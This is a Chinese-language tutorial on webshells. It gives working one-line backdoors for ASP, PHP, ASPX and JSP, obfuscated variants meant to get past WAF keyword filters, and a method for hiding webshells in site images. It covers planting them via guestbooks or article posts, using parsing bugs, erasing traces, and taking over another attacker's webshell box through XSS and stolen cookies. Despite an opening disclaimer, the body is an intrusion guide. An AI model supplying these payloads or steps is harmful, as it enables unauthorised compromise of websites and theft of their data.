提示：本文所讨论的技术仅用于研究学习，旨在提高大家信息安全意识，任何人不得将其用于非法目的。

@木马及木马后门的讲解，webshell箱子溯源追踪

---

一：webshell制作原理

webshell:即web网站后门 getshell:是指拿webshell的过程

1.webshell的种类

• 一句话木马
• 小马
• 大马
• 打包马
• 脱裤马

2.一句话木马:

介绍：一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。

这是一个一句话木马，我们把它插入到asp的网页中，然后用菜刀链接一下就可以
<%execute request("value")%>
X.asp
xxxx.com/X.asp?value=assdadasad

工作原理：
黑客在注册信息的电子邮箱或者个人主页等中插入类似的如下代码：

<%execute request("value")%>

其中value是值，所以你可以更改自己的值，前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见，而且字符少，对表单字数有限制的地方特别的实用)
当知道了1数据库的URL，就可以利用本地一张网页进行连接得到webshell。（不知道数据库也可以，只要知道<%eval request(value)%>这个文件被插入到哪一个ASP文件里面就可以了）
这就被称作一句话木马，它是基于B/S结构的。

3.常见写法

asp一句话木马：
<%eval request("c")%>

php一句话木马：
<?php @eval($_POST[value])?>

aspx一句话木马：
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

jsp一句话：
< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

4.一句话木马变形记

让一句话木马变形绕过 WAF：
WAF通常会以关键字判断是否为一句话木马，所以要将一句话木马变形使用，从而绕过 waf。
后期我还会用大量篇幅来具体的讲解一下木马的制作。

<?php $_REQUEST['a']($_REQUEST['b'])?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>

5.一句话图片马的制作

C32下做一句话
打开C32,把图片放里面，写入一句话保存，退出

我们在制作图片马的时候，也可以同时添加asp,php等其他脚本的木马，这样就拥有了两用的木马。
制作图片马时，要尽量找网站素材图片，这些图片管理员看到也不敢乱删

6.常见的一句话客户端：

• 中国菜刀
• 冰蝎
• 蚁剑

这些都是常见的一句话客户端，不过要小心一下后门。

7.小马

小马体积小，容易隐蔽，隐蔽性强，最重要在于与图片结合一起，上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能，通常用小马上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。

8.大马

大马体积比较大，一般50K以上。功能也多，一般都包括提权命令，磁盘管理，数据库连接接口，执行命令甚至有些具备自带提权功能和压缩，解压缩网站程序的功能。这种马隐蔽性不好，而大多如不加密的话很多杀毒厂商开始追杀此类程序。

二：webshell使用技巧

1.一句话的使用：

• 首先，找到数据库是asp格式的网站，然后，以留言板，或者发表文章的方式，把一句话添加到asp数据库，或者加进asp网页。
• 记住！我们的目的是把一句话<%execute request(“value”)%>添加到数据库，无论任何方式。
• 然后打开客户端（就是你电脑上面的那个html文件），填上加入了一句话的asp文件，或者asp网页，然后进入此网站服务器。

2.小马的使用

主要用来上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。
下面让我们参观一个小马：

3.大马的使用

• 用途
• 提权
• 打包
• 脱裤
• 增删文件

下面让我们看一下大马的情况：

这就是一个大马的界面，大马具有很多的功能，对于后渗透操作将非常有帮助。

4.使用技巧

• 内容编码
• 配合解析漏洞
• 配合文件包含
• 利用文件名溢出

三：webshell黑吃黑

1.找shell后门

• 查找后门
• 查找webshell后门
• 找到后门地址
• 反搞webshell箱子

2.找一句话客户端后门

• 查找客户端程序后门
• 反搞webshell箱子

3.实验

下面让我们通过一个实验感受一下"webshell黑吃黑"的过程吧：
假设我们已经在某企业网站上种植了我们从别人手中购买的木马。
通过分析发现了如下后门

然后我们再分析一下木马b.asp的文件，果然证实了上面的想法。

面对这种情况，我们该怎么办呢？
别慌！让我们通过XSS来反搞一下。


当然还有cookie信息，有了这些东西我们就能登录这个webshell箱子了

此时，表示我们已经成功的打掉了另一个黑客的阴谋。
你以为我在第一层，不，我在大气层。